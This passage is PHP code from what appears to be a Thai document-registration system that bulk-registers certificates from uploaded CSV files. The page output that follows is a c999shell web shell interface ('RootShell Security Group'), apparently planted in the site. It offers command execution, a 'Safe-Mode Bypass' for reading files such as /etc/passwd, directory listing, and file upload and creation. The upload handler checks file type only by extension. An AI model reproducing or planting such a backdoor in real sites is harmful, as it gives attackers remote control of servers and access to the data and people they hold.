"; $oDoc->DocDateCreate=$timeDocDateCreate; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocUserCreate=$personId; //echo "DocUserCreate=".$oDoc->DocUserCreate."
"; $oDoc->DocTypeNo=($reNo+$i); // echo "DocTypeNo=".$oDoc->DocTypeNo."
"; $oDoc->DocDate=splitDateForm($DocDate,"/"); // echo "DocDate=".$oDoc->DocDate."
"; if($oDt1->sendNoPrefix!=""){ $DocNo=$oDt1->sendNoPrefix; } if($oDt1->sendNoSuffix!=""){ $DocNo=$DocNo.$oDt1->sendNoSuffix; } $DocNo = preg_replace("/%o/", "$oSys->sysDocNo", $DocNo); $DocNo = preg_replace("/%d/", "$oDP->deptNo", $DocNo); $DocNo = preg_replace("/%r/", "$oDoc->DocTypeNo", $DocNo); $Y = date('Y')+543; $DocNo = preg_replace("/%y/", "$Y", $DocNo); $oDoc->DocNo=$DocNo; //echo "DocNo=".$oDoc->DocNo."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocShortDesc=$DocShortDesc; $oDoc->DocGroup=$DocGroup; //echo "DocGroup=".$oDoc->DocGroup."
"; $oDoc->CertificatePs=$name; $oDoc->endDoc="Y"; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $oDoc->Save(); //echo "

"; //---------------add DocReceiveSend $oRs->AddNew(); $oRs->DrsID=$oRs->GetNextCode(); $oRs->DocID=$e; $oRs->DlcID=$DlcID; //echo "R-DlcID=".$oRs->DlcID."
"; $oRs->DsID=1; $oRs->PtID=$oRs->PtID; $oRs->DrsDocTypeNo=$oDoc->DocTypeNo; //echo "R-DrsDocTypeNo=".$oRs->DrsDocTypeNo."
"; $oRs->DrsReceiveDate=$DocDateCreate; //echo "R-DrsReceiveDate=".$oRs->DrsReceiveDate."
"; $oRs->DrsReceivePersonId=$personId; //echo "R-DrsReceivePersonId=".$oRs->DrsReceivePersonId."
"; $oRs->DrsDlcIDCreate=$DlcID; //echo "R-DrsDlcIDCreate=".$oRs->DrsDlcIDCreate."
"; $oRs->DrsPsIDCreate=$personId; //echo "R-DrsPsIDCreate=".$oRs->DrsPsIDCreate."
"; $oRs->DocGroup=$DocGroup; //echo "R-DocGroup=".$oRs->DocGroup."
"; $oRs->DrsflagRead="N"; //echo "R-DrsflagRead=".$oRs->DrsflagRead."
"; $oRs->Save(); //echo "------------------
"; $i++; } } echo ""; }else if($method=="confirmRegisterDocAllreg"){ echo "

กรุณารอสักครู่ ระบบกำลังดำเนินการลงทะเบียนหนังสือรับรองจำนวน ".$countps." รายการ
"; $oDt1->SearchByKey($DtID); $oDt1->GetRecord(); $oSys->RSsysConfig(); $oSys->GetRecord(); $oDP2->SearchByKey($deptId); $oDP2->GetRecord(); if($oDP2->deptLevel!=0){ $deptId=SearchdeptIdlevel0($oDP2->deptParentId); } $oDP->SearchByKey($deptId); $oDP->GetRecord(); $oRd->SearchRunningBydocGroupDtID2($DocGroup,$DtID); $oRd->GetRecord(); $oRd->Edit(); $reNo=$oRd->regisNo; $oRd->regisNo=($reNo+$countps); $oRd->Save(); $UPath='uploadfile/'.$filename; $fp = fopen($UPath, "r"); $i = 1; $timeDocDateCreate=getNowDateTh()." ".date('H:i:s'); while(!feof($fp)) { $char = fgets($fp); $stdCode=""; $prefixname=""; $name=""; $surname=""; list($stdCode,$prefixname, $name, $surname) = split('[,]', $char); $DocNo=""; if($stdCode!=""){ //echo $name."เลขทะเบียน=".($reNo+$i)."
"; $oDoc->AddNew(); $oDoc->DocID=$oDoc->GetNextCode(); $e=$oDoc->GetNextCode(); $oDoc->DlcID=$DlcID; //echo "DlcID=".$oDoc->DlcID."
"; $oDoc->DtID=$DtID; //echo "DtID=".$oDoc->DtID."
"; $oDoc->DsID=1; $oDoc->RsID=$RsID; //echo "RsID=".$oDoc->RsID."
"; $oDoc->DocDateCreate=$timeDocDateCreate; $DocDateCreate=$oDoc->DocDateCreate; $oDoc->DocUserCreate=$personId; //echo "DocUserCreate=".$oDoc->DocUserCreate."
"; $oDoc->DocTypeNo=($reNo+$i); // echo "DocTypeNo=".$oDoc->DocTypeNo."
"; $oDoc->DocDate=splitDateForm($DocDate,"/"); // echo "DocDate=".$oDoc->DocDate."
"; if($oDt1->sendNoPrefix!=""){ $DocNo=$oDt1->sendNoPrefix; } if($oDt1->sendNoSuffix!=""){ $DocNo=$DocNo.$oDt1->sendNoSuffix; } $DocNo = preg_replace("/%o/", "$oSys->sysDocNo", $DocNo); $DocNo = preg_replace("/%d/", "$oDP->deptNo", $DocNo); $DocNo = preg_replace("/%r/", "$oDoc->DocTypeNo", $DocNo); $Y = date('Y')+543; $DocNo = preg_replace("/%y/", "$Y", $DocNo); $oDoc->DocNo=$DocNo; //echo "DocNo=".$oDoc->DocNo."
"; $oDoc->DocSubject=$DocSubject; //echo "DocSubject=".$oDoc->DocSubject."
"; $oDoc->DocFrom=$DocFrom; //echo "DocFrom=".$oDoc->DocFrom."
"; $oDoc->DocShortDesc=$DocShortDesc; //echo "DocShortDesc=".$oDoc->DocShortDesc."
"; $oDoc->DocGroup=$DocGroup; //echo "DocGroup=".$oDoc->DocGroup."
"; $oDoc->CertificatePs=$prefixname.$name.' '.$surname; $oDoc->endDoc="Y"; if($useMainDocNo=="Y"){ $useMainDocNo="Y"; }else{ $useMainDocNo="N"; } $oDoc->useMainDocNo=$useMainDocNo; $oDoc->stdCode=$stdCode; $oDoc->Save(); //echo "

"; //---------------add DocReceiveSend $oRs->AddNew(); $oRs->DrsID=$oRs->GetNextCode(); $oRs->DocID=$e; $oRs->DlcID=$DlcID; //echo "R-DlcID=".$oRs->DlcID."
"; $oRs->DsID=1; $oRs->PtID=$oRs->PtID; $oRs->DrsDocTypeNo=$oDoc->DocTypeNo; //echo "R-DrsDocTypeNo=".$oRs->DrsDocTypeNo."
"; $oRs->DrsReceiveDate=$DocDateCreate; //echo "R-DrsReceiveDate=".$oRs->DrsReceiveDate."
"; $oRs->DrsReceivePersonId=$personId; //echo "R-DrsReceivePersonId=".$oRs->DrsReceivePersonId."
"; $oRs->DrsDlcIDCreate=$DlcID; //echo "R-DrsDlcIDCreate=".$oRs->DrsDlcIDCreate."
"; $oRs->DrsPsIDCreate=$personId; //echo "R-DrsPsIDCreate=".$oRs->DrsPsIDCreate."
"; $oRs->DocGroup=$DocGroup; //echo "R-DocGroup=".$oRs->DocGroup."
"; $oRs->DrsflagRead="N"; //echo "R-DrsflagRead=".$oRs->DrsflagRead."
"; $oRs->Save(); //echo "------------------
"; $i++; } } echo ""; }else if($method=="upload_file"){ $rootdir = "uploadfile"; //กำหนด directoryบเก็บ file ที่จะ upload เข้าไป $limitfile = 70000; //กำหนด ขนาด file ที่อนุญาติให้โหลดเข้ามาเก็บได้ (ต่อ 1 file) หน่วยเป็น byte $fileName = date('dmY_His'); $docPath = "$rootdir/".$fileName.".csv"; if($uploadfile_size > $limitfile) { ?>
"; } else if(substr($uploadfile_name, -3) != 'csv') { ?>
"; } else { copy($uploadfile, $docPath); ?>
">
"; } }else if($method=="upload_filereg"){ $rootdir = "uploadfile"; //กำหนด directoryบเก็บ file ที่จะ upload เข้าไป $limitfile = 70000; //กำหนด ขนาด file ที่อนุญาติให้โหลดเข้ามาเก็บได้ (ต่อ 1 file) หน่วยเป็น byte $fileName = date('dmY_His'); $docPath = "$rootdir/".$fileName.".csv"; if($uploadfile_size > $limitfile) { ?>
"; } else if(substr($uploadfile_name, -3) != 'csv') { ?>
"; } else { copy($uploadfile, $docPath); ?>
">
"; } }else if($method=="RegisterDocAll"){ echo ""; }else if($method=="showDocNomain"){ ?>
"; } ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--